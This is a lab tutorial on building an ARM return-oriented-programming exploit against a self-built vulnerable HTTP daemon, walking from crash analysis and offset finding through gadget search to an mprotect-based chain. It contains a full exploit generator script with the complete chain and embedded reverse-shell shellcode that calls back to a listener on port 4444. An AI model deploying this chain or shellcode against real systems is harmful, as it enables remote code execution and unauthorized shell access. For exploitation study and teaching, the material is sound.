The goal of this part is to go through the whole process of developing a ROP chain against a known vulnerable target. In this case I built a simple vulnerable HTTP server (myhttpd) which runs locally on my armbox on port 8080. The attacked daemon has a stack overflow in the URL parameter. For details on how to build myhttpd or the lab setup, see the first post of this series.
Investigating the memory map
As I already mentioned in the previous article, we need a part of the loaded binary (.text segment, dynamically loaded library) in which we search for gadgets. I used libc for my ROP chain. You can use any other part, or several parts.
Start your debugger, attach to the vulnerable process and show the memory map:
[root@armbox ~]# r2 -d $(pidof myhttpd)
= attach 757 757
bin.baddr 0x00400000
Using 0x400000
asm.bits 32
-- Don't look at the code. Don't look.
[0xb6ef862c]> dmm
0x00400000 /usr/bin/myhttpd
0xb68c2000 /usr/lib/libgcc_s.so.1
0xb68ef000 /usr/lib/libdl-2.28.so
0xb6902000 /usr/lib/libffi.so.6.0.4
0xb691a000 /usr/lib/libgmp.so.10.3.2
0xb6988000 /usr/lib/libhogweed.so.4.4
0xb69c6000 /usr/lib/libnettle.so.6.4
0xb6a0d000 /usr/lib/libtasn1.so.6.5.5
0xb6a2d000 /usr/lib/libunistring.so.2.1.0
0xb6ba9000 /usr/lib/libp11-kit.so.0.3.0
0xb6cae000 /usr/lib/libz.so.1.2.11
0xb6cd3000 /usr/lib/libpthread-2.28.so
0xb6cfd000 /usr/lib/libgnutls.so.30.14.11
0xb6e5a000 /usr/lib/libc-2.28.so
0xb6fa5000 /usr/lib/libmicrohttpd.so.12.46.0
0xb6fce000 /usr/lib/ld-2.28.so
[0xb6ef862c]>
The larger the (r-x) segments of the used library / binary are, the better the chances to find good gadgets. Choose wisely... :)
I have chosen:
0xb6e5a000 /usr/lib/libc-2.28.so
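To compare candidates by the size of their executable mappings, a small helper like the following can be handy. This is only a sketch: it assumes the standard Linux /proc/<pid>/maps text format, and the sample lines (including all sizes) are invented for illustration, they are not taken from the armbox.

```python
from collections import defaultdict

# Hypothetical sample in /proc/<pid>/maps format (sizes are invented).
SAMPLE_MAPS = """\
00400000-00401000 r-xp 00000000 b3:02 1234 /usr/bin/myhttpd
00411000-00412000 rw-p 00001000 b3:02 1234 /usr/bin/myhttpd
b6e5a000-b6f90000 r-xp 00000000 b3:02 5678 /usr/lib/libc-2.28.so
b6f90000-b6fa0000 ---p 00136000 b3:02 5678 /usr/lib/libc-2.28.so
b6fa5000-b6fc0000 r-xp 00000000 b3:02 9012 /usr/lib/libmicrohttpd.so.12.46.0
"""


def executable_bytes(maps_text):
    """Sum the size of all executable mappings per backing file."""
    sizes = defaultdict(int)
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 6:          # anonymous mapping without a path
            continue
        addr_range, perms, path = fields[0], fields[1], fields[5]
        if "x" not in perms:         # only executable segments hold gadgets
            continue
        start, end = (int(x, 16) for x in addr_range.split("-"))
        sizes[path] += end - start
    return dict(sizes)


if __name__ == "__main__":
    ranked = sorted(executable_bytes(SAMPLE_MAPS).items(), key=lambda kv: -kv[1])
    for path, size in ranked:
        print(f"{size:>10} {path}")
```

On a live system the same function could be fed with the content of /proc/<pid>/maps of the attached process instead of the sample string.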
Investigating the crash
Let's crash the daemon! We will send a long URL to "myhttpd" and inspect the registers and the stack. Check out the following asciinema, make it fullscreen to avoid missing anything.
The daemon crashed and we see PC got overwritten with 0x41414140. What happened? As I explained in the second part of this series, the overflow overwrote the saved LR of a non-leaf function. As soon as this function executed its epilogue to restore the saved values, the saved LR got popped into PC to return to the caller. One note on the least significant bit: the BX instruction basically copies the LSB of the address loaded into PC to the T status bit of the CPSR register, which switches the core between ARM and Thumb mode: ARM (LSB=0) / Thumb (LSB=1). The saved LR (overwritten with 0x41414141) got popped into PC, then the LSB of the popped address got written into the T bit (bit 5) of the CPSR register, and finally the LSB of PC itself was set to 0, resulting in 0x41414140.
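The bit juggling described above can be written down in a few lines. This is a simplified model of an interworking branch (the function name is made up for this example), not a CPU emulator:

```python
def branch_exchange(target):
    """Model how an interworking branch splits a 32-bit target address."""
    thumb = bool(target & 1)        # bit 0 goes into the CPSR T bit
    pc = target & 0xFFFFFFFE        # bit 0 of PC itself is cleared
    return pc, thumb


pc, thumb = branch_exchange(0x41414141)
print(hex(pc), "Thumb" if thumb else "ARM")   # 0x41414140 Thumb
```

This is why the debugger shows 0x41414140 although the overflow data only consists of 0x41 bytes.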
As we can see, R11 also contains our value 0x41414141. That means the overflown function saves LR and R11 on the stack and restores them from it. Some compilers use R11 as a reference to point to local variables within a function call (frame pointer): the variables are then accessed as FP + offset within that function.
Additionally, as we see in the asciinema, the stack contains 'A'! Therefore we control the values of PC and R11, and we have some space on the stack. Nice.
Let's take a deeper look into the stack. The following lines show the memory of the myhttpd process after the crash:
[0x41414140]> dm
0x00400000 # 0x00401000 - usr 4K s r-x /usr/bin/myhttpd /usr/bin/myhttpd ; loc.imp._ITM_registerTMCloneTable
0x00410000 # 0x00411000 - usr 4K s r-- /usr/bin/myhttpd /usr/bin/myhttpd
0x00411000 # 0x00412000 - usr 4K s rw- /usr/bin/myhttpd /usr/bin/myhttpd ; obj._GLOBAL_OFFSET_TABLE
0x00412000 # 0x00433000 - usr 132K s rw- [heap] [heap]
0xb5500000 # 0xb5521000 - usr 132K s rw- unk0 unk0
0xb5521000 # 0xb5600000 - usr 892K s --- unk1 unk1
0xb56ff000 # 0xb5700000 - usr 4K s --- unk2 unk2
0xb5700000 # 0xb5f00000 - usr 8M s rw- unk3 unk3
0xb5f00000 # 0xb5f21000 - usr 132K s rw- unk4 unk4
0xb5f21000 # 0xb6000000 - usr 892K s --- unk5 unk5
0xb60bf000 # 0xb60c0000 - usr 4K s --- unk6 unk6
0xb60c0000 # 0xb68c2000 - usr 8M s rw- unk7 unk7
[...]
loaded libraries
[...]
0xbefdf000 # 0xbf000000 - usr 132K s rw- [stack] [stack]
0xffff0000 # 0xffff1000 - usr 4K s r-x [vectors] [vectors]
One noticeable thing is that SP (SP = 0xb5efea50) does not point into the section which is advertised as [stack], but into an anonymous mapping at lower addresses than the mapped libraries:
0xb5700000 # 0xb5f00000 - usr 8M s rw- unk3 unk3
It is worth understanding what is happening here. The [stack] entry is the stack of the main thread; the 8M (rw-) mapping shown here, together with the 4K (---) mapping right in front of it (unk2), belongs to a thread. The used microhttpd library opens a listener thread, which then opens a worker thread for each new connection.
Check out the following strace to understand what is happening (pid 363 is the listener thread, 370 the worker thread):
[pid 363] mmap2(NULL, 8392704, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0xb56ff000
[pid 363] mprotect(0xb5700000, 8388608, PROT_READ|PROT_WRITE) = 0
[pid 363] clone(child_stack=0xb5efef98, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0xb5eff4c8, tls=0xb5eff920, child_tidptr=0xb5eff4c8) = 370
You can find the whole strace here.
We see that the listener thread (glibc) prepares a stack for the new thread and assigns an appropriate child_stack to it. It took me some time to get what happened... to visualize the memory map, I made a picture... enjoy:
+------------------+--------------------------------------------------+--------------------------+
|                  |                                                  |                          |
|      No R/W      |                                 ...AAAAAAA       | pthread_t, TLS of thread |
|   permissions    | <----------------------------- mprotect(RW) ------------------------------> |
|                  |                                                  |                          |
+------------------+--------------------------------------------------+--------------------------+
0xb56ff000         0xb5700000                             ^           ^                 0xb5f00000
                                                          |           |
   guard memory       thread stack growing downwards      |           |
<-----------------> <-------------------------------------+-----------+ 0xb5efef98
                                                          |             SP of thread at creation
                                                          SP at crash
                                                          0xb5efea50
mmap2() allocates a chunk of memory (8392704 bytes, starting at 0xb56ff000) with no (---) permissions (see system call mmap2(), parameter PROT_NONE). Then mprotect() adds (rw-) permissions to a section of that memory region (8388608 bytes starting at 0xb5700000), but leaves out a little bit at the start.
The thread's stack (child_stack parameter of clone()) will point into the (rw-) region. Since the stack grows downwards, the memory region without (rw-) permissions acts as a guard page. Since the stack already grew a little bit, the SP value we observed after the crash points to an address which is a little bit smaller than the initial child_stack value.
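The numbers from the strace and the debugger can be cross-checked with a bit of arithmetic. The following sketch only uses values shown above; the variable names are mine:

```python
MMAP_BASE = 0xb56ff000      # return value of mmap2()
MMAP_LEN = 8392704          # length passed to mmap2()
RW_BASE = 0xb5700000        # address passed to mprotect()
RW_LEN = 8388608            # length passed to mprotect()
CHILD_STACK = 0xb5efef98    # child_stack passed to clone()
SP_AT_CRASH = 0xb5efea50    # SP observed in the debugger

guard_size = RW_BASE - MMAP_BASE          # part left without permissions
region_end = MMAP_BASE + MMAP_LEN         # end of the whole mapping
stack_used = CHILD_STACK - SP_AT_CRASH    # how far the stack grew so far

print(f"guard size  : {guard_size} bytes")      # 4096
print(f"region end  : {region_end:#x}")         # 0xb5f00000
print(f"rw end      : {RW_BASE + RW_LEN:#x}")   # 0xb5f00000
print(f"stack in use: {stack_used} bytes")      # 1352
```

So the guard area is exactly one 4096 byte page, the (rw-) part ends where the mapping ends, and SP at crash time sits 1352 bytes below the initial child_stack.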
Well, let's summarize: We control the execution flow and also got some memory to store our ROP chain!
Finding the offsets
We already learned in the previous post that knowing the stack layout is crucial in building stack overflows. If you have many or large local variables stored on the stack, you have to shift your ROP payload many bytes towards higher memory regions to reach the saved LR.
Therefore the next step is to find the right offsets (shifter variable in my overflowgen.py script, I will introduce that soon) to shift the address of our first gadget (and therefore the whole ROP chain and overflow data) exactly to where the saved LR resides. Over the years plenty of tools got developed to ease that task; one is included in the metasploit framework (/usr/share/metasploit-framework/tools/pattern_create.rb). But since we are using radare2, like the cool kids, we can use ragg2's included De Bruijn pattern generator:
As you can see ragg2 does not avoid putting 1 into LSB (I do not know if metasploit does that, though). Therefore if ragg2 does not find the offset, try with +1, as I did in the video. Our offsets:
- PC: 144 Bytes
- SP: 148 Bytes
For reference, the command line to generate and query the De Bruijn patterns:
BRUIJN=`ragg2 -r -P 250| tr -d '\n'`; echo -e "GET $BRUIJN HTTP/1.1\n" | nc 127.0.0.1 8080
Then you can use ragg2 to query for the found offsets: ragg2 -q 0x....
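To make the idea behind the pattern lookup more tangible, here is a minimal Python sketch of a De Bruijn pattern generator and an offset search that also tries the value with the LSB set. It is not ragg2's implementation and it does not produce the same sequence as ragg2, so offsets must be queried with the same generator that created the pattern. The alphabet, the function names and the simulated crash at offset 144 are assumptions for this example.

```python
import struct


def de_bruijn(alphabet, n):
    """Return a De Bruijn sequence B(k, n) over the given alphabet as bytes."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq)


def find_offsets(pattern, pc_value):
    """Offsets where pc_value, or pc_value with bit 0 set, occurs in pattern."""
    hits = []
    for candidate in (pc_value, pc_value | 1):
        idx = pattern.find(struct.pack("<I", candidate))
        if idx != -1 and idx not in hits:
            hits.append(idx)
    return hits


pattern = de_bruijn(b"ABCDEFGH", 4)[:250]

# Simulate the crash: the 4 bytes at offset 144 end up in PC, LSB cleared.
crashed_pc = struct.unpack("<I", pattern[144:148])[0] & 0xFFFFFFFE
print(find_offsets(pattern, crashed_pc))   # the list contains 144
```

Because the core clears the LSB of PC, the search may return a second candidate offset; the one that also fits the other overwritten registers is the right one.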
Exploiting the vulnerability
Depending on the length of your ROP chain you can execute basically all commands which you would otherwise execute in shellcode. Nonetheless, space on the stack might be restricted, and moreover it is much simpler to build, test and then execute shellcode. Now we have two conflicting goals: we have memory space for shellcode on the stack, but the stack is only (rw-), so we can't execute it. Well, we already met the system call mprotect() when the worker thread stack was created. Nothing stops us from using that system call again to make the stack (rwx) instead of (rw-) and then execute our shellcode from the stack. Many classic ROP chains use exactly that technique...
Defining the goal: parameters for mprotect()
The prototype of mprotect():
int mprotect(void *addr, size_t len, int prot);
addr is the address where mprotect() starts to apply the permissions. After the call, the next len bytes will have the permissions passed via the prot parameter. The parameter prot has to be a bitwise OR of the following values:
#define PROT_READ 0x1 /* Page can be read. */
#define PROT_WRITE 0x2 /* Page can be written. */
#define PROT_EXEC 0x4 /* Page can be executed. */
#define PROT_NONE 0x0 /* Page can not be accessed. */
mman-linux.h
Our target register values then are:
- R0: address of the thread stack. addr must be aligned to the system's page size (most commonly 4096 bytes). You want R0 to be smaller than the address where your shellcode will be loaded.
- R1: some value large enough to make sure our stack will be made executable.
- R2: 0x7 (PROT_READ | PROT_WRITE | PROT_EXEC)
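The three target values can be sketched as follows. The helper name, the example address (SP at crash time) and the length of 0x2000 are only illustrative assumptions; the page size of 4096 bytes matches the system used in this post.

```python
PROT_READ = 0x1
PROT_WRITE = 0x2
PROT_EXEC = 0x4
PAGE_SIZE = 4096   # assumption: the common 4 KiB page size


def mprotect_args(shellcode_addr, length):
    """Return (addr, len, prot) for an rwx mprotect() covering shellcode_addr."""
    addr = shellcode_addr & ~(PAGE_SIZE - 1)      # round down to the page start
    prot = PROT_READ | PROT_WRITE | PROT_EXEC     # bitwise OR of the flags
    return addr, length, prot


r0, r1, r2 = mprotect_args(0xb5efea50, 0x2000)
print(f"R0={r0:#x} R1={r1:#x} R2={r2:#x}")   # R0=0xb5efe000 R1=0x2000 R2=0x7
```

Rounding down guarantees that R0 is page aligned and not larger than the address of the shellcode.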
The chaining instruction of our last ROP gadget will point to the address of mprotect() in libc. mprotect() will then return, and next our shellcode will be executed. I guess now is a good point to talk about chaining instructions...
Chaining instructions - handling BX LR
When I explained the general ROP idea in the second part of this series, I already dropped two gadgets with different chaining instructions: POP {..., PC} and BLX R4. Then we talked about leaf and non-leaf functions, compared their epilogues and found that BX LR is used in leaf functions to return back to the caller.
Certainly this instruction is also used as the chaining instruction of a gadget. Since we can't be too picky with gadgets, we have to use what we get.
I think at this point it should be pretty clear how we chain gadgets like POP {..., PC} (if not, see the previous post). But how do we handle BX LR?
One way would be to prepare the LR register with the next gadget's address each time before using a gadget which uses BX LR as chaining instruction. That would certainly be possible, but pretty costly in terms of space and not very effective. A more elegant way is to point LR to a gadget which does something like POP {PC}, so that we can use BX LR gadgets just by pushing the address of the next gadget on the stack. A simple example:
Execution flow:

LR: 0xaaaaaaaa

   +-------+ 0xaaaaaaaa : pop {pc}  <------+ 2)
   |                                       |
3) |         0xbbbbbbbb : mov r0, #1337; bx lr  <---------+ 1)
   |
   +-------> 0xcccccccc : mov r2, r1; pop {r11, pc}

Stack layout during execution:

              SP
              +       0xa...  0xc...
              |       +--->   +---------->
              v
+-------------+-------+-------+------+-----------------------+
|             | 0x    | JUNK  | value|                       |
|             | cc    | value | for  |                       |
|             | cc    | for   | PC   |                       |
|             | cc    | R11   |      |                       |
|             | cc    |       |      |                       |
+-------------+-------+-------+------+-----------------------+
0x0                                                        0xF
We want to first execute the gadget at 0xbbbbbbbb, then the gadget at 0xcccccccc. LR points to the gadget at 0xaaaaaaaa. When a gadget uses BX LR as chaining instruction, BX LR will jump to 0xaaaaaaaa, which POPs the value at SP into PC and therefore continues the execution there. In our example we prepared the ROP chain in a way that 0xaaaaaaaa POPs the address 0xcccccccc into PC. Each time we use a BX LR gadget now, we can push the following gadget's address on the stack and therefore chain them in a more convenient way.
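The flow of the example can be replayed with a toy model. This is not an emulator: the three gadgets are hard-coded, the stack is a plain Python list, and the addresses, the JUNK value and the final 0xdeadbeef are placeholders for illustration.

```python
def run_chain(stack, entry, lr, max_steps=10):
    """Toy model: follow PC through the three example gadgets."""
    regs = {"r0": 0, "r1": 0x11, "r2": 0, "r11": 0, "lr": lr}
    sp = 0                      # index of the next word on the stack
    pc = entry
    trace = []

    for _ in range(max_steps):
        trace.append(pc)
        if pc == 0xaaaaaaaa:            # pop {pc}
            pc = stack[sp]
            sp += 1
        elif pc == 0xbbbbbbbb:          # mov r0, #1337; bx lr
            regs["r0"] = 1337
            pc = regs["lr"]
        elif pc == 0xcccccccc:          # mov r2, r1; pop {r11, pc}
            regs["r2"] = regs["r1"]
            regs["r11"] = stack[sp]
            pc = stack[sp + 1]
            sp += 2
        else:                           # left the known gadgets
            break
    return trace, regs


JUNK = 0x4a554e4b
stack = [0xcccccccc, JUNK, 0xdeadbeef]
trace, regs = run_chain(stack, entry=0xbbbbbbbb, lr=0xaaaaaaaa)
print([hex(x) for x in trace])
```

The trace shows the order 0xbbbbbbbb, 0xaaaaaaaa, 0xcccccccc: the BX LR gadget never needs to know its successor, it only needs LR to point to the POP {PC} gadget.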
Sometimes there are chaining instructions which use BL in any combination, like BLX R7. When we can't avoid using such a gadget, we have to restore our value in LR to point again to 0xaaaaaaaa, since the BL instruction will update LR with the address of the instruction following the branch (PC+4).
For all other chaining instructions I assume the instructions show what has to be done and how the ROP chain has to be prepared to chain gadgets successfully.
Using ropper
How do we find gadgets? You can manually dissect and disassemble them using objdump... but that's a pain. Let me introduce ropper:
ropper can be easily installed in a python virtualenv. Check the GitHub for instructions.
I'll let the following asciinema explain the most important features:
The parameter /1/ specifies the quality of the found gadgets, which basically stands for the number of instructions per gadget. /1/ will find gadgets where the first instruction matches the search parameter and the second is the chaining opcode. /2/ will consequently also find gadgets which have a second instruction before the chaining one. You can use these gadgets too, as long as the extra instructions do not interfere with your ROP chain...
Ropper shows the offsets of the found instructions inside the searched binary. In the first section of this post we already had a look at where in memory the libraries reside. To use the gadgets from within libc we add the offset ropper shows us to the base address we already found out.
As you already know, ARM instructions are 32 bit long, Thumb instructions only 16 bit. We can use this fact and interpret 32 bit ARM instructions as 16 bit Thumb instructions by just splitting them in half. Ropper does that automatically if we set arch ARMTHUMB. Beware: as you can see in the asciinema above, if we set ARMTHUMB as architecture, ropper will show us two columns of offsets (red and green). The green one is the one you want to choose as offset. You will note that the LSB of the green addresses is 1, so the core will automatically switch to Thumb mode when the gadget is executed.
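Turning a ropper offset into a runtime address is simple arithmetic. A minimal sketch, using the libc base from the memory map and two gadget offsets that appear later in the exploit script (the helper name is made up):

```python
LIBC_BASE = 0xb6e5a000   # base of libc-2.28.so taken from the memory map


def gadget_address(offset, thumb=False, base=LIBC_BASE):
    """Runtime address of a gadget; Thumb gadgets get bit 0 set."""
    address = base + offset
    return address | 1 if thumb else address


print(hex(gadget_address(0x0005c038)))               # ARM:   pop {lr}; bx r3
print(hex(gadget_address(0x00103250, thumb=True)))   # Thumb: pop {r3, r7, pc}
```

This yields 0xb6eb6038 and 0xb6f5d251. The second value has its LSB set, which corresponds to the green offset column ropper prints for Thumb gadgets.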
ROP ROP ROP
The next step is to build the ROP chain, which
- sets up R0, R1 and R2 in a way that the stack region of our thread is going to be remapped (rwx) after mprotect() was called
- calls mprotect()
- jumps to our shellcode on the stack
Currently I do not think that it would be very helpful to explain the whole ROP chain. If you want an explanation, contact me and I will add one. Until then, I hope the embedded comments and the following bullet points are sufficient.
- My ROP chain comments notation:
  - (7): new (7th) gadget
  - (7 p1): parameter 1 to gadget (7)
  - ergo: "(15 p1): (16) mov r0, #56" means that parameter 1 of gadget 15 is the address of gadget (16).
- Preparing the mprotect() call:
  - How to prepare R0: load SP + 4 into R0 (11), align the value to 4096 (page size on my system) (14) by calculating R0 AND R1 (0xFFFFF001 - the LSB of SP will always be 0). R1 got initialized by gadget (9 p2).
  - How to prepare R1: load with 0x01010101 (15 p1)
  - How to prepare R2: load 0xFFFFFFFF-0x29 into R6 (3 p4), ADD 0x31 (= 0x7) (4). Then move R6 to R2 (6)
  - mprotect() is then called in (15 p2)
- When mprotect() returns, it will execute our prepared BX LR slide, which will execute POP {PC} and load the address of the last gadget from the stack. The last gadget (16) is then executed: BLX SP. Since SP now points to our shellcode, which is appended directly to our ROP chain, this will execute the shellcode.
- The shellcode I used is from Azeria's great tutorial on ARM shellcode - in this case it is the TCP reverse shellcode, which connects back to port 4444. I changed the connectback IP to 192.168.250.1. That means the exploited myhttpd process will connect back to a netcat listener on my host system.
The other gadgets which are part of my ROP chain (see below in the script) are used to set up the BX LR slide, restore it, prepare values, and so on...
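The two register tricks from the bullet points can be verified with plain 32-bit arithmetic. In this sketch the SP value is only an illustrative stand-in (the SP seen at crash time); the real SP at the moment the gadget runs will differ.

```python
MASK32 = 0xFFFFFFFF


def add32(a, b):
    """32-bit addition with wraparound, as a 32-bit register performs it."""
    return (a + b) & MASK32


# R2: 0xFFFFFFFF - 0x29 is loaded into R6, then the ADDS gadget adds 0x31.
r6 = add32(0xFFFFFFFF - 0x29, 0x31)

# R0: SP + 4 is ANDed with the mask 0xFFFFF001 held in R1.
sp = 0xb5efea50                      # illustrative value only
r0 = add32(sp, 4) & 0xFFFFF001

print(hex(r6), hex(r0))              # 0x7 0xb5efe000
```

The addition overflows the 32-bit register and leaves 0x7 behind, and since bit 0 of SP + 4 is always 0, the mask 0xFFFFF001 gives the same result as a clean 0xFFFFF000 page mask.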
The ROP chain is embedded in my overflowgen.py script (see below), which should make ROP chain development easier. Take your time to understand the script and its features, like --human print and --httpencode. You can read about how I use --human in the next section.
The first few variables (shift, shellcode, fmt, base) depend on your environment. During this post we found the values for base, shift (offset). Check them and make sure you understand what they do and how we found them during this tutorial.
You can find the ROP chain I used to exploit myhttpd as the overflow variable in the following script.
#!/usr/bin/env python3
import struct
import sys
import argparse
from urllib.parse import quote_from_bytes

parser = argparse.ArgumentParser()
parser.add_argument('--human', help='print overflow string human readable', action='store_true', default=False)
parser.add_argument('--httpencode', help='HTTP encode overflow data (not pre_out() and post_out() data)', action='store_true', default=False)
args = parser.parse_args()

# <I little endian unsigned integer
# adjust to your CPU arch
fmt = '<I'
# base address in the process memory of the library you want to use for your ROP chain
base = 0xb6e5a000
# how many bytes should we shift? memory: [shift*"A"+data()+lib(),...]
shift = 144
shifter = [bytes(shift * 'A', 'ascii'), 'shifter']
shellcode = b'\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0a\xa1\x4a\x70\x10\x22\x02\x37\x01\xdf\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x21\x01\xdf\x20\x1c\x02\x21\x01\xdf\x04\xa0\x52\x40\x49\x40\xc2\x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\xc0\xa8\xfa\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58'


def pre_out():
    # request line prefix, printed before the overflow data
    print("GET ", end='')


def post_out():
    # request line suffix, printed after the overflow data
    print(" HTTP/1.1\r\n\r\n\r\n", end='')


def data(data, cmt=''):
    # raw 32 bit value (register content, junk, ...)
    return [struct.pack(fmt, data), cmt]


def lib(offset, cmt=''):
    # address inside the library: base + offset
    return [struct.pack(fmt, base + offset), cmt]


def out(data):
    # binary output: shifter + ROP chain + shellcode
    data = [d[0] for d in data]
    b = bytearray(b''.join(data))
    pre_out()
    sys.stdout.flush()
    if shellcode:
        for x in shellcode:
            b.append(x)
    if args.httpencode:
        b = quote_from_bytes(b)
        print(b, end='')
    else:
        sys.stdout.buffer.write(b)
    sys.stdout.flush()
    post_out()
    sys.stdout.flush()


def out_human(data):
    # readable output: "0x<value> = <comment>|..." followed by the shellcode
    pre_out()
    sys.stdout.flush()
    b = '['
    for d in data:
        b += '0x' + d[0].hex() + ' = ' + d[1] + '|'
    if shellcode:
        b += shellcode.hex()
    b += ']'
    print(b, end='')
    sys.stdout.flush()
    post_out()
    sys.stdout.flush()


# big endian packing, so that the hex dump reads like a normal address
if args.human:
    fmt = '>I'

overflow = [
    shifter,
    # prepare BX LR slider, chaining with r3
    lib(0x00103251),             # (1): 0x00103250 (0x00103251): pop {r3, r7, pc};
    lib(0x0000220f, 'r3'),       # (1 p1): prepare r3 for gadget (3) 0x0000220e (0x0000220f): pop {r0, r3, r4, r6, r7, pc};
    data(0x56565656, 'r7'),      # (1 p2): JUNK
    lib(0x0005c038, 'pc'),       # = (1 p3: ) (2): 0x0005c038: pop {lr}; bx r3;
    lib(0x000db435, 'lr'),       # = (2 p1): bx lr slide: 0x000db434 (0x000db435): pop {pc};
    # / prepare BX LR slider
    lib(0x00024cb4, 'r0'),       # (3 p1) (5:) and r0, r0, #1; bx lr;
    lib(0x00103251, 'r3'),       # (3 p2) (7:) restore lr,
    data(0x54545454, 'r4'),      # (3 p3) # JUNK
    data(0xFFFFFFFF-0x29, 'r6'), # (3 p4): value for (4) gadget
    data(0x57575757, 'r7'),      # (3 p5)
    lib(0x00012f6f, 'PC'),       # (3 p6) (4:) adds r6, #0x31; bx r0;
    lib(0x0003ea84),             # (5 p1 bx lr) (6:) mov r2, r6; blx r3;
    lib(0x00116b80),             # (7: p1) (9:) 0x00116b80: pop {r1, pc};
    data(0x57575757),            # (7 p2)
    lib(0x0005c038, 'pc'),       # = (7 p3: ) (8:) 0x0005c038: pop {lr}; bx r3; (2)
    lib(0x000db435, 'lr'),       # = (8 p1): bx lr slide: 0x000db434 (0x000db435): pop {pc};
    data(0xFFFFF001, 'r1'),      # (9 p1)
    lib(0x00103251),             # (9 p2) (10:) 0x00103250 (0x00103251): pop {r3, r7, pc};
    lib(0x00103251, 'r3'),       # (10 p1) (11:) 0x00103250 (0x00103251): pop {r3, r7, pc};
    data(0x56565656, 'r7'),      # (10 p2)
    lib(0x00107cb4, 'PC'),       # (10 p3) add r0, sp, #4; blx r3;
    lib(0x00024e54, 'R3'),       # (11 p1), (13:) #0x00024e54: and r0, r0, r1; bx lr;
    data(0x57575757, 'r7'),      # (11 p2)
    lib(0x0005c038, 'pc'),       # (11 p3: ) (12): 0x0005c038: pop {lr}; bx r3;
    lib(0x000db435, 'lr'),       # (12 p1): bx lr slide: 0x000db434 (0x000db435): pop {pc};
    lib(0x00116b80),             # (13 p1) (14:) 0x00116b80: pop {r1, pc};
    data(0x10101010, 'r1'),      # (14 P1)
    lib(0x000d22d0, 'PC'),       # (14 p2) mprotect
    lib(0x00034d1d, 'PC')        # blx sp
]

if args.human:
    out_human(overflow)
else:
    out(overflow)
Download the script here.
ROP chain development process
My process is currently as follows:
- I only add one gadget at a time.
- Before sending the payload to the vulnerable process I attach my debugger.
- I set up the new gadget in a way that PC is going to be something known, the same for changed registers.
- After I executed the payload I inspect the registers to check if the gadget was successfully executed.
To ease that task I added a --human option to my script, which basically prints out the following output:
[root@armbox ~]# python overflowgen-myhttpd.py --human
GET
[0x41[...]1414141414141414141414141 = shifter|0xb6f5d251 = |0xb6e5c20f = r3|0x56565656 = r7|
0xb6eb6038 = pc|0xb6f35435 = lr|0xb6e7ecb4 = r0|0xb6f5d251 = r3|0x54545454 = r4|0xffffffd6 = r6|
0x57575757 = r7|0xb6e6cf6f = PC|0xb6e98a84 = |0xb6f70b80 = |0x57575757 = |0xb6eb6038 = pc|
0xb6f35435 = lr|0xfffff001 = r1|0xb6f5d251 = |0xb6f5d251 = r3|0x56565656 = r7|0xb6f61cb4 = PC|
0xb6e7ee54 = R3|0x57575757 = r7|0xb6eb6038 = pc|0xb6f35435 = lr|0xb6f70b80 =
|0x10101010 = r1|0xb6f2c2d0 = PC|0xb6e8ed1d = PC|01308fe213ff2fe102200121921ac827513701df041c0aa14a701022023701df3f27201c491a01df201c012101df201c022101df04a052404940c2710b2701df02ff115cc0a8fa012f62696e2f736858] HTTP/1.1
After adding a gadget you can human-print your payload and check if the registers match with the planned values.
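If you prefer to compare the planned values programmatically, the --human output can be split into (value, label) pairs. The parser below is a sketch that assumes the output format shown above; the sample string is a shortened, hand-made excerpt of it.

```python
def parse_human(line):
    """Split the bracketed --human payload into (value, label) pairs."""
    body = line[line.index("[") + 1:line.rindex("]")]
    *entries, shellcode_hex = body.split("|")
    pairs = []
    for entry in entries:
        value, _, label = entry.partition("=")
        pairs.append((int(value.strip(), 16), label.strip()))
    return pairs, shellcode_hex.strip()


# Shortened excerpt of the output above, for illustration only.
SAMPLE = ("GET [0x41414141 = shifter|0xb6f5d251 = |0xb6e5c20f = r3|"
          "0x56565656 = r7|01308fe2] HTTP/1.1")

pairs, shellcode_hex = parse_human(SAMPLE)
for value, label in pairs:
    print(f"{value:#010x} {label}")
```

The resulting pairs can then be checked against the register values shown by the debugger after each added gadget.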
General Observations
Be well aware: not all registers are equal, at least in the used libc. Moving something into R0 is easy...
(ropper) dimi@dimi-lab ~/arm-rop % count=0; while [[ $count -le 12 ]]; do echo -n R$count": "; ropper --file libc-2.28.so --quality 1 --search "mov r$count,%" 2>/dev/null| grep ':' | wc -l; let count=count+1; done
search mov R0, any
R0: 88
R1: 14
R2: 7
R3: 8
R4: 1
R5: 1
R6: 2
R7: 1
R8: 0
R9: 0
R10: 0
R11: 0
R12: 0
... moving something out, maybe not so:
(ropper) dimi@dimi-lab ~/arm-rop % count=0; while [[ $count -le 12 ]]; do echo -n R$count": "; ropper --file libc-2.28.so --quality 1 --search "mov %, r$count" 2>/dev/null| grep ':' | wc -l; let count=count+1; done
search mov any, R0
R0: 0
R1: 3
R2: 6
R3: 8
R4: 13
R5: 32
R6: 25
R7: 10
R8: 8
R9: 7
R10: 5
R11: 3
R12: 4
That's only one example and only ARM (not ARMTHUMB), nonetheless interesting.
Another important point is: the fewer registers you pollute with your values, the better. As you saw earlier you might need registers which are "stack bound"; especially in processes which create threads, these might be rare.
Action